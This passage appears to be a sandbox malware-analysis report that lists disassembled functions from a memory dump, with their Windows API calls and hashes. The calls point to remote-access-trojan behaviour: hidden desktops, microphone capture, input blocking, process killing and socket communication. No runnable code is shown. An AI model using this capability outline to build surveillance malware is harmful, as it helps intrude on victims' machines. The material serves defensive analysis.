                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: Create$Event$LoadThread$CursorLibrarySleep
                                  • String ID:
                                  • API String ID: 4260334496-0
                                  • Opcode ID: 6a72a5383d11af6366eef8e668f0eca70c1c37063ba52816f244b8df7a3461a9
                                  • Instruction ID: c59a37a0acd5baca38e55ff48be4d35e87a7e4384eddb5524ec6f63c4d2b40a0
                                  • Opcode Fuzzy Hash: 6a72a5383d11af6366eef8e668f0eca70c1c37063ba52816f244b8df7a3461a9
                                  • Instruction Fuzzy Hash: 5A618D71944358EFFB01CFA4CC85B99BBB1FF08704F214269EA09AF291DBB56984CB50
                                  APIs
                                  • CreateFileA.KERNEL32(1008C3A0,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000), ref: 1002903B
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 10029051
                                  • CloseHandle.KERNEL32(00000000), ref: 1002905E
                                  • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 10029095
                                  • ReadFile.KERNEL32(?,00000000,00002004,?,00000000), ref: 100290BB
                                  • LocalAlloc.KERNEL32(00000040,00002005), ref: 1002913F
                                  • LocalFree.KERNEL32(00000000,00000000,00002005), ref: 10029169
                                  • CloseHandle.KERNEL32(?), ref: 1002917B
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: File$CloseHandleLocal$AllocCreateFreePointerReadSize
                                  • String ID:
                                  • API String ID: 1977366500-0
                                  • Opcode ID: 06862d6e628c96e44db61c450cfa86f673cef34714ca3d458c4b5ce58c6b00be
                                  • Instruction ID: 05b18666988b2d57f3d9217cb419e8f2545e93519f6cc1a37b70974b435602e6
                                  • Opcode Fuzzy Hash: 06862d6e628c96e44db61c450cfa86f673cef34714ca3d458c4b5ce58c6b00be
                                  • Instruction Fuzzy Hash: 58417E32C007586BE722CF35DC8AFABBBA9EF96294F414365FD4567152DB30A590C250
                                  APIs
                                  • waveInStop.WINMM(?), ref: 10031917
                                  • waveInReset.WINMM(?), ref: 10031920
                                  • waveInUnprepareHeader.WINMM(?,?,00000020), ref: 10031937
                                  • waveInClose.WINMM(?), ref: 10031948
                                  • TerminateThread.KERNEL32(?,000000FF), ref: 10031958
                                  • waveOutReset.WINMM(?), ref: 10031967
                                  • waveOutUnprepareHeader.WINMM(?,?,00000020), ref: 1003197C
                                  • waveOutClose.WINMM(?), ref: 1003198D
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: wave$CloseHeaderResetUnprepare$StopTerminateThread
                                  • String ID:
                                  • API String ID: 1871795907-0
                                  • Opcode ID: fd4e554af39c1897f28da165c6ab7652b56a9fd56d6954aa3b48b62a1f540cdf
                                  • Instruction ID: 08e3d9819712ba9c06a7546ace4b7f6dbadf2f16f8b5ba78db8f21746d45bc26
                                  • Opcode Fuzzy Hash: fd4e554af39c1897f28da165c6ab7652b56a9fd56d6954aa3b48b62a1f540cdf
                                  • Instruction Fuzzy Hash: 3B319F31100712AFE7229F24CE49B4ABBF7FF09742F020525F542665B2CBB2B961CB90
                                  APIs
                                  • LocalAlloc.KERNEL32(00000040,00000400), ref: 1002B70B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: AllocLocal
                                  • String ID: error
                                  • API String ID: 3494564517-1574812785
                                  • Opcode ID: 0e30ff0be3cd7a99014f13caab1c895325d429850372a6cbc8d0d47899f38cad
                                  • Instruction ID: 87cf78f19df4f2e2c250e3477c2cb821f923a06f511105c26726402a03c4bf1c
                                  • Opcode Fuzzy Hash: 0e30ff0be3cd7a99014f13caab1c895325d429850372a6cbc8d0d47899f38cad
                                  • Instruction Fuzzy Hash: C1C13BB6D00628ABDB61CB60DC85FDBB7BDEF09306F0041D6E649E6141EA749BC48F64
                                  APIs
                                  • select.WS2_32(00000000,00000001,00000000,00000000,00000000), ref: 10033335
                                  • recv.WS2_32(?,?,00002000,00000000), ref: 10033360
                                  • ioctlsocket.WS2_32(?,8004667E,?), ref: 1003338B
                                  • send.WS2_32(?,?,00000000,00000000), ref: 1003339E
                                  • recv.WS2_32(?,?,00002000,00000000), ref: 100333EB
                                  • ioctlsocket.WS2_32(?,8004667E,?), ref: 10033418
                                  • send.WS2_32(?,?,00000000,00000000), ref: 1003342D
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: ioctlsocketrecvsend$select
                                  • String ID:
                                  • API String ID: 1327307048-0
                                  • Opcode ID: 906b029a5bb81f1d5f7c9af15fde3f840bd490723277665e90d1123524e3e764
                                  • Instruction ID: 1a011c778300417fe0c7fbce9278f550d2c3746ebfcbb5045af7473a90917cae
                                  • Opcode Fuzzy Hash: 906b029a5bb81f1d5f7c9af15fde3f840bd490723277665e90d1123524e3e764
                                  • Instruction Fuzzy Hash: 74517271D002299FE722CB248CC9BDA77FDEB54741F0281D5EA09EB251DB74AE948F90
                                  APIs
                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 1001C93D
                                    • Part of subcall function 1003AD97: RaiseException.KERNEL32(?,?,10037AE9,?,?,?,?,?,?,?,?,10037AE9,?,1007D1C4,?), ref: 1003ADF7
                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 1001C97C
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 1001C9AF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: Exception@8Throw$ExceptionRaise___std_exception_copy
                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                  • API String ID: 3941765731-1866435925
                                  • Opcode ID: 63dcfda7d63d032f1716e17ffe55bac927f35aee516b518060a9ce598641b3a9
                                  • Instruction ID: d5e3de63c55628b19c2000d1a567c0787a8579addfb50cbf1d7ce839a7c90327
                                  • Opcode Fuzzy Hash: 63dcfda7d63d032f1716e17ffe55bac927f35aee516b518060a9ce598641b3a9
                                  • Instruction Fuzzy Hash: 9011E4B29007496FC300CF68C805F9AB3E8EF46311F44811AF9959B541EB74F984CB95
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 1001E0D0
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 1001E0F2
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 1001E112
                                  • __Getctype.LIBCPMT ref: 1001E1AB
                                  • std::_Facet_Register.LIBCPMT ref: 1001E1CA
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 1001E1E2
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                  • String ID:
                                  • API String ID: 1102183713-0
                                  • Opcode ID: 681ceeaaed8dc5f2c49d00f6d9b9152a8584b6e4d5aeae72a770ffeea55858ee
                                  • Instruction ID: 062f07d219ea14dce69a777b7693e6c9c7997e40bd95c5e1246d68e40fed0c4c
                                  • Opcode Fuzzy Hash: 681ceeaaed8dc5f2c49d00f6d9b9152a8584b6e4d5aeae72a770ffeea55858ee
                                  • Instruction Fuzzy Hash: ED418D75E00699AFD712CF54CC81A9EB7F4FB08710F15416AE849AB252DB30FE84CB91
                                  APIs
                                  • GetLogicalDriveStringsA.KERNEL32 ref: 10023946
                                  • LoadLibraryA.KERNEL32(100785E4), ref: 10023967
                                  • GetProcAddress.KERNEL32(00000000,100785F0), ref: 10023979
                                  • GetDiskFreeSpaceExA.KERNEL32(?,?,?,00000000), ref: 100239DF
                                  • GetDriveTypeA.KERNEL32(?), ref: 10023A15
                                  • FreeLibrary.KERNEL32(00000000), ref: 10023A80
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: DriveFreeLibrary$AddressDiskLoadLogicalProcSpaceStringsType
                                  • String ID:
                                  • API String ID: 4075051408-0
                                  • Opcode ID: b47d31fd8134c527ff1e60617c34d66e7240cd668a4117a9490562be075cbdf9
                                  • Instruction ID: 03fad9e3220ddd01e97f2f4d6930ad22e7b60cdc7a19972496df4d1f2e58c30c
                                  • Opcode Fuzzy Hash: b47d31fd8134c527ff1e60617c34d66e7240cd668a4117a9490562be075cbdf9
                                  • Instruction Fuzzy Hash: 8E41BF719083849FD321CF65D885B9BBBE9FFC9300F444A2EF6C983241DB7499448B62
                                  APIs
                                  • GetLogicalDriveStringsA.KERNEL32(000001F4,?), ref: 10027422
                                  • QueryDosDeviceA.KERNEL32(?,?,00000064), ref: 1002748F
                                  • lstrlen.KERNEL32(?), ref: 1002749D
                                  • lstrcpy.KERNEL32(?,?), ref: 100274D2
                                  • lstrcpy.KERNEL32(?,?), ref: 100274F9
                                  • lstrcat.KERNEL32(?,?), ref: 10027509
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: lstrcpy$DeviceDriveLogicalQueryStringslstrcatlstrlen
                                  • String ID:
                                  • API String ID: 140800143-0
                                  • Opcode ID: 848fefb265b114799ff729f2bc1cb4dddf06a7e7de417f185b2ecd037655b320
                                  • Instruction ID: 39212c5b1d95f5b624ceb72d46171a3c8f4af5cb374dc271110dd4982a15aeee
                                  • Opcode Fuzzy Hash: 848fefb265b114799ff729f2bc1cb4dddf06a7e7de417f185b2ecd037655b320
                                  • Instruction Fuzzy Hash: 6531C671A0522D9FEB10DB659C84BEABBF9EF04241F4101E9E94CD3141DB359E44CB64
                                  APIs
                                  • LoadLibraryW.KERNEL32(100782C8), ref: 1002066B
                                  • LoadLibraryW.KERNEL32(10077444), ref: 1002069E
                                  • GetProcAddress.KERNEL32(00000000,10077470), ref: 100206AC
                                  • LoadLibraryW.KERNEL32(100784DC), ref: 1002070B
                                  • GetProcAddress.KERNEL32(00000000,100784F8), ref: 10020717
                                  • CloseHandle.KERNEL32(?), ref: 10020731
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: LibraryLoad$AddressProc$CloseHandle
                                  • String ID:
                                  • API String ID: 3524107332-0
                                  • Opcode ID: 4e48f718020730475509d88cb472ff8b2e81a6571b290db39801417ef68355cd
                                  • Instruction ID: 1d61f272dd9ef774b40447da58156e128ff69bcde8841d39cf5c5990d459934a
                                  • Opcode Fuzzy Hash: 4e48f718020730475509d88cb472ff8b2e81a6571b290db39801417ef68355cd
                                  • Instruction Fuzzy Hash: D0318171E0021AABEB10DBF48C89FFFBBB9EB48211F114065FA05A7140DBB859448BA4
                                  APIs
                                  • EnumDisplaySettingsA.USER32(00000000,000000FF,?), ref: 1002636D
                                  • SystemParametersInfoA.USER32(00000056,00000001,00000000,00000000), ref: 100263AB
                                  • PostMessageA.USER32(0000FFFF,00000112,0000F170,00000002), ref: 100263C2
                                  • SystemParametersInfoA.USER32(00000056,00000000,00000000,00000000), ref: 100263E2
                                  • PostMessageA.USER32(0000FFFF,00000112,0000F170,000000FF), ref: 100263F9
                                  • BlockInput.USER32(00000000), ref: 1002641E
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: InfoMessageParametersPostSystem$BlockDisplayEnumInputSettings
                                  • String ID:
                                  • API String ID: 3716559231-0
                                  • Opcode ID: 686142ef5859ede20a165432fd72ce74a68c17b5a7763130732016e976f15d9a
                                  • Instruction ID: 547d89d1b1610af92eaf4cb319994f2e5b770b0a19f73efa71270f5cc1d548f1
                                  • Opcode Fuzzy Hash: 686142ef5859ede20a165432fd72ce74a68c17b5a7763130732016e976f15d9a
                                  • Instruction Fuzzy Hash: 1531F430B44354ABF721DB64DC86F6977E2EB09B20F914164F2559B1D2CBF0AD80CB65
                                  APIs
                                    • Part of subcall function 1002F230: GetWindowsDirectoryA.KERNEL32(?,00000104,1006421C), ref: 1002F265
                                    • Part of subcall function 1002F230: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1002F2A6
                                    • Part of subcall function 1002F230: wsprintfA.USER32 ref: 1002F325
                                  • OpenDesktopA.USER32(1008C550,00000000,00000001,10000000), ref: 1002F17C
                                  • CreateDesktopA.USER32(1008C550,00000000,00000000,00000000,10000000,00000000), ref: 1002F199
                                  • SetThreadDesktop.USER32(00000000), ref: 1002F1A5
                                  • CreateThread.KERNEL32(00000000,00000000,Function_0002DEE0,?,00000000,00000000), ref: 1002F1BB
                                  • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1002F1C9
                                  • CloseHandle.KERNEL32 ref: 1002F1D5
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: Desktop$CreateThread$CloseDirectoryHandleInformationObjectOpenSingleVolumeWaitWindowswsprintf
                                  • String ID:
                                  • API String ID: 324691535-0
                                  • Opcode ID: 3845cce9e9fde1723da69093afbd83c06e900c504b702d66fa7cf4dd953a814b
                                  • Instruction ID: 70b794907d896dd25518a96eb5c8d1c1de0bed7810abce98404e6e0b363124b4
                                  • Opcode Fuzzy Hash: 3845cce9e9fde1723da69093afbd83c06e900c504b702d66fa7cf4dd953a814b
                                  • Instruction Fuzzy Hash: C92127B0C50A28ABFF128FA4ED8AF153AB6F785345F104127F600956A1EBB135C48F99
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: _free_strpbrk
                                  • String ID: *?
                                  • API String ID: 3300345361-2564092906
                                  • Opcode ID: c968066907e81d68ffe4dad4d12aa97e1709e4bd35cae7e557639fc8d0fc980d
                                  • Instruction ID: fba09f8060e945c6895979ab2c3d8ad04f5f2383c5225b3efb0427b4f81040dd
                                  • Opcode Fuzzy Hash: c968066907e81d68ffe4dad4d12aa97e1709e4bd35cae7e557639fc8d0fc980d
                                  • Instruction Fuzzy Hash: 12613E75D0021A9FDB15CFA8C8919EDFBF5EF48360B25826AE845E7300E735AE458B90
                                  APIs
                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 1001C93D
                                    • Part of subcall function 1003AD97: RaiseException.KERNEL32(?,?,10037AE9,?,?,?,?,?,?,?,?,10037AE9,?,1007D1C4,?), ref: 1003ADF7
                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 1001C97C
                                  • ___std_exception_copy.LIBVCRUNTIME ref: 1001C9AF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: Exception@8Throw$ExceptionRaise___std_exception_copy
                                  • String ID: ios_base::badbit set$ios_base::failbit set
                                  • API String ID: 3941765731-1240500531
                                  • Opcode ID: 98a6770c7ec57db31817461d9e8867c898c0e71c43d7be13d0378881151408d0
                                  • Instruction ID: 80cc92c63628d0bdec8218dea72c12e4770374f5c5bca51ca4acf6c1d373d1d9
                                  • Opcode Fuzzy Hash: 98a6770c7ec57db31817461d9e8867c898c0e71c43d7be13d0378881151408d0
                                  • Instruction Fuzzy Hash: 0541C3B1900649AFC704CF68C845F9EB7F9EF49320F14811AF555AB641EB74EA84CBA0
                                  APIs
                                  • RtlEnterCriticalSection.NTDLL(?), ref: 100220E4
                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 100220F9
                                  • wsprintfA.USER32 ref: 100221B6
                                  • Sleep.KERNEL32(0000001E), ref: 100222C0
                                  • RtlLeaveCriticalSection.NTDLL(?), ref: 10022387
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterFreeLeaveSleepVirtualwsprintf
                                  • String ID:
                                  • API String ID: 2944957049-0
                                  • Opcode ID: 9d552aa4cfdbc2bc1ebaec5f7d7154af41a66ed788ca5a29df126f9b8e99985e
                                  • Instruction ID: cb27c8ff20e7134111ae125e99d652656509788b6cb5d05c538d50ed42136d3f
                                  • Opcode Fuzzy Hash: 9d552aa4cfdbc2bc1ebaec5f7d7154af41a66ed788ca5a29df126f9b8e99985e
                                  • Instruction Fuzzy Hash: 75919071A00619ABEB14CFA8CC84B99B3A6FF48310F514269E80DD7690DB74ED55CF84
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: _free$AllocateHeap
                                  • String ID:
                                  • API String ID: 3033488037-0
                                  • Opcode ID: b32ee7ae031e735a09d92d7b03cfcc94aafdd2b44e5745457985b002a63f7e45
                                  • Instruction ID: db0cc29435beae4b768ec7cc4697f70b325c16d8fb72360fd7c0a4b7f0dde7b2
                                  • Opcode Fuzzy Hash: b32ee7ae031e735a09d92d7b03cfcc94aafdd2b44e5745457985b002a63f7e45
                                  • Instruction Fuzzy Hash: 9C51AD72A00205AFD711DF69DC81BBAB7F5EF48760F21456EE849DB251E731AD01CB88
                                  APIs
                                  • lstrlen.KERNEL32(?,10081068), ref: 1002352E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 1002354D
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 100235DE
                                  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 100235EC
                                  • GetLastError.KERNEL32 ref: 100235F6
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: AttributesCreateDirectoryErrorFileLastlstrcpylstrlen
                                  • String ID:
                                  • API String ID: 20055568-0
                                  • Opcode ID: dab6ccab855774077855ed387905f2eea14643219c8d08e528fc68d56d83d03d
                                  • Instruction ID: 89121dfa56694283c6479d63b2e1cd0b15255159a75d69954703029334b202f7
                                  • Opcode Fuzzy Hash: dab6ccab855774077855ed387905f2eea14643219c8d08e528fc68d56d83d03d
                                  • Instruction Fuzzy Hash: A4413DB1C046659FDB11CF5898407AEBFFAEF09690F90816AE8A593340D7755D028FE0
                                  APIs
                                  • CreateEventA.KERNEL32(00000000,00000001), ref: 10021132
                                    • Part of subcall function 1002A050: GetComputerNameA.KERNEL32(?,00000200), ref: 1002A0A2
                                    • Part of subcall function 1002A050: lstrcpy.KERNEL32(?,100796B0), ref: 1002A0B8
                                    • Part of subcall function 1002A050: wsprintfA.USER32 ref: 1002A0E4
                                    • Part of subcall function 1002A050: _strstr.LIBCMT ref: 1002A135
                                  • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,00000000), ref: 10021195
                                    • Part of subcall function 10028F90: CreateFileA.KERNEL32(1008C3A0,80000000,00000001,00000000,00000003,00000080,00000000,?,10064158), ref: 10028FBF
                                    • Part of subcall function 10028F90: GetFileSize.KERNEL32(00000000,00000000), ref: 10028FCE
                                    • Part of subcall function 10028F90: CloseHandle.KERNEL32(00000000), ref: 10028FE3
                                  • Sleep.KERNEL32(00000096), ref: 100211D6
                                  • CreateFileA.KERNEL32(1008C3A0,80000000,00000001,00000000,00000003,00000080,00000000), ref: 100211F3
                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 1002120D
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: File$Create$Size$CloseComputerEventFolderHandleNamePathSleepSpecial_strstrlstrcpywsprintf
                                  • String ID:
                                  • API String ID: 1777496915-0
                                  • Opcode ID: 88508c75d9a78b685f84d98e61458beaf7690ba0fc2af3093b4ca17e5acc0635
                                  • Instruction ID: 4bdbab1b38ce9c0d19af704a08b366f4cb12715bb44e1c118ab8a8cc83f7fdad
                                  • Opcode Fuzzy Hash: 88508c75d9a78b685f84d98e61458beaf7690ba0fc2af3093b4ca17e5acc0635
                                  • Instruction Fuzzy Hash: DA41B274D80228AAEB20DB60DC86FC9BB75EF44710F500196F658B72D2DBB16A80CF54
                                  APIs
                                    • Part of subcall function 100330C0: Sleep.KERNEL32(000003E8), ref: 10033128
                                    • Part of subcall function 10032F40: wvsprintfA.USER32(?,?,?), ref: 10032F61
                                  • inet_addr.WS2_32(?), ref: 1002B37D
                                    • Part of subcall function 100331F0: socket.WS2_32(00000002,00000001,00000000), ref: 1003320A
                                    • Part of subcall function 100331F0: htons.WS2_32(?), ref: 10033229
                                    • Part of subcall function 100331F0: connect.WS2_32(00000000,?,00000010), ref: 1003323A
                                    • Part of subcall function 100331F0: closesocket.WS2_32(00000000), ref: 1003324A
                                  • recv.WS2_32(00000000,?,00000002,00000000), ref: 1002B3BA
                                  • CreateThread.KERNEL32(00000000,00000000,10032F90,?,00000000,?), ref: 1002B406
                                  • Sleep.KERNEL32(000003E8), ref: 1002B42F
                                  • closesocket.WS2_32(00000000), ref: 1002B455
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: Sleepclosesocket$CreateThreadconnecthtonsinet_addrrecvsocketwvsprintf
                                  • String ID:
                                  • API String ID: 421157994-0
                                  • Opcode ID: 9ebfc658d1857ff8fa6b3ec0dd3bd2b9cfbd26a4088693096c3a521002b87afc
                                  • Instruction ID: b3acd073d34fc2feedabeea08f4acf68b5e625be9df513abaac2d19c9da4f4d7
                                  • Opcode Fuzzy Hash: 9ebfc658d1857ff8fa6b3ec0dd3bd2b9cfbd26a4088693096c3a521002b87afc
                                  • Instruction Fuzzy Hash: 0641F074504744AFE321DF60CC85BDBB7E8EF45701F00482EFA8586292DBB4B944CBA6
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1002823B
                                  • Process32First.KERNEL32(00000000,00000128), ref: 10028255
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 10028367
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 10028372
                                  • CloseHandle.KERNEL32(00000000), ref: 10028379
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: Process$CloseCreateFirstHandleOpenProcess32SnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 2931323676-0
                                  • Opcode ID: 2dfbfd971162c5546ededc63e6ac8cde6437efa44529e886355037815126b1a7
                                  • Instruction ID: 573a8162694a671c2fe7d68689165028d079f35879c4a6f3561fe621a96fba65
                                  • Opcode Fuzzy Hash: 2dfbfd971162c5546ededc63e6ac8cde6437efa44529e886355037815126b1a7
                                  • Instruction Fuzzy Hash: 08412535A0021D9FEB11CB60AC85BEA77EDEF05644F4500E6FA08DB141EB72AB49CB90
                                  APIs
                                    • Part of subcall function 100330C0: Sleep.KERNEL32(000003E8), ref: 10033128
                                    • Part of subcall function 10032F40: wvsprintfA.USER32(?,?,?), ref: 10032F61
                                  • inet_addr.WS2_32(?), ref: 1002B37D
                                    • Part of subcall function 100331F0: socket.WS2_32(00000002,00000001,00000000), ref: 1003320A
                                    • Part of subcall function 100331F0: htons.WS2_32(?), ref: 10033229
                                    • Part of subcall function 100331F0: connect.WS2_32(00000000,?,00000010), ref: 1003323A
                                    • Part of subcall function 100331F0: closesocket.WS2_32(00000000), ref: 1003324A
                                  • recv.WS2_32(00000000,?,00000002,00000000), ref: 1002B3BA
                                  • CreateThread.KERNEL32(00000000,00000000,10032F90,?,00000000,?), ref: 1002B406
                                  • Sleep.KERNEL32(000003E8), ref: 1002B42F
                                  • closesocket.WS2_32(00000000), ref: 1002B455
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: Sleepclosesocket$CreateThreadconnecthtonsinet_addrrecvsocketwvsprintf
                                  • String ID:
                                  • API String ID: 421157994-0
                                  • Opcode ID: f51cd4f50fe536f6641357fae3ce4ccad5643432601bcb19d665fff625a65d17
                                  • Instruction ID: 5588e68ed6425f2ff60b23ace10c17daefb66debb4642901992ef4c9020f7f0e
                                  • Opcode Fuzzy Hash: f51cd4f50fe536f6641357fae3ce4ccad5643432601bcb19d665fff625a65d17
                                  • Instruction Fuzzy Hash: CD41D071504740AFE321DF60CC85B9BB7E8EF45701F40482EFA8596292DBB4B944CBA6
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 10037094
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 100370B4
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 100370D4
                                  • std::_Facet_Register.LIBCPMT ref: 10037198
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 100371B0
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_10001000_DAPIjX8.jbxd
                                  Similarity
                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                  • String ID:
                                  • API String ID: 459529453-0
                                  • Opcode ID: fb16aeb2875a944e3336d5cad351bf72bae7e1541c6434f1b8e8d819a81eadbc
                                  • Instruction ID: 9480613635b0f2967e01e9bb59217a1922f7e2c943d44ef104bd2069d9eaf7b8
                                  • Opcode Fuzzy Hash: fb16aeb2875a944e3336d5cad351bf72bae7e1541c6434f1b8e8d819a81eadbc
                                  • Instruction Fuzzy Hash: 5441AD75A00255DFDB26CF58C880B9ABBF4FF04755F11815EE809AF281DB71AE01CB92
                                  APIs
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 1003061D
                                  • std::_Lockit::_Lockit.LIBCPMT ref: 1003063D
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 1003065D
                                  • std::_Facet_Register.LIBCPMT ref: 100306FB
                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 10030713
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3247470830.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                  Joe Sandbox IDA Plugin
